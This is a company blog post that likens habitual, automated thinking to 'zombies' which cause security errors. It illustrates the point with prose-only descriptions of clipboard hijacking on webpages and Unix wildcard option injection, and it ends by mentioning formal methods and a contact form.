Computer Security and Zombies, Part II


In my previous blog post, I mused about the concept of a Philosophical Zombie (P-Zombie) in the world of Computer Security. A P-Zombie looks and acts human, but is behaving without intention or sentience. The behavior may be complex, but it lacks free-will. In the security space, where errors are the source of many vulnerabilities, I suggested that every software author plays the part of a Security Zombie on a regular basis. Our intentions, our highest consciousness, are too resource-intensive to focus on everything. We wouldn’t be able to function in complex situations if we couldn’t abstract, automate, and even react impulsively.

In short, our minds are designed to think intentionally about a very small number of things while thinking about everything else on auto-pilot!

I am going to torture the P-Zombie analogy much further. Instead of thinking of the human mind as one single entity, I will describe it as a small tiny human pilot in a control room surrounded by a horde of zombies. The pilot is intentional and sentient. The zombies are mindless creatures that simply complete automated tasks. The pilot is in charge of the highest thought processes but passes on countless tasks for execution to the shuffling minions outside the control room.

These zombies, inside all of our brains, are the source of many errors that result in computer security vulnerabilities.

Unfortunately, we need them. Imagine a computer software developer writing code. Think about all the different levels of automation that go into that task. Do you suppose the developer thinks consciously about every single key press? No! And thank goodness it is so, because otherwise it would take forever to write! Fortunately for all of us, the developer has a zombie automation that can handle the banality of typing letters on a keyboard while the tiny pilot tries to consciously create solutions to complex problems.

But even in the complex processing, the pilot cannot possibly consider every possible detail and resorts to abstraction. From a certain point of view, an abstraction is another form of automation, another zombie in the mind. As an incredibly trivial example, consider the original emoticon smiley face:

:)

It’s just a colon and a right parenthesis, yet we are willing to abstract those two symbols into a face, and an emotive one at that. While you and I can analyze :) consciously if we wish, it is generally just an artifact of one of our many internal automated zombies.

But while we need these zombies, they are both a blessing and a curse. Our automations and our abstractions inevitably result in an error. We either use automation when it isn’t appropriate, or we find our abstraction doesn’t work in certain unexpected edge cases. The bad guys in the computer security world win quite often by using their pilots against everyone else’s zombies.

I found two examples of this in my research the other day that I think are worth sharing.

The first is an article about security vulnerability related to “copy and paste.” As advanced web developers know, most webpages of even moderate complexity contain dynamically generated data. That is, the data displayed on the webpage is being created on-the-fly by a computer program. But these web programs can also alter the contents of data copied to the clipboard. This means that the data you copy from a webpage may be completely different from what you see on the screen!

The security implications are quite serious. Under certain circumstances, bad guys could even cause computers to execute harmful commands if copied into certain applications. Obviously it is important to know about these dangers.

But even users that do know will often not think about it in practice. It’s just one more detail for our fictional pilot to think about; one more thing that it generally turns over to an automated zombie. When you visit a web page, do you really want to think about how the data on the page is created? Do you really want to have to think about how copy and paste works?

The second example is far more esoteric and I won’t go into too much technical detail. The high-level summary is that commands in operating systems like Unix or Linux often use wildcard symbols to select many files. When a wildcard is used, the command will operate on every file that matches the pattern. However, these commands also take control parameters that change how they work. If a bad guy custom names a file to be the same as a control parameter, and this name matches the wildcard pattern, then instead of being interpreted as a file it will change the behavior of the command.

There are a couple of key points that I want to note in the context of this blog post.

  1. The bad guy causes havoc simply by naming a file!
  2. This vulnerability is old and many people don't even know it exists any more!

I emphasize these points because they illustrate the problem with the zombie horde we have in our brains. As with the first, this second vulnerability exploits abstractions that computer users have in their heads. When I see those wildcards, for example, I automatically think file names. Although I know how it works under the hood, I haven’t ever broken that abstraction long enough to look for this vulnerability before.

What is to be done? I believe the key is learning how to put our inner-zombie on a leash. Various approaches, such as formal methods, enable us to do exactly that. In a subsequent post, I’ll discuss how a few of these in greater detail.

Ready to learn more?

Fill out this form

or email us at info@crimsonvista.com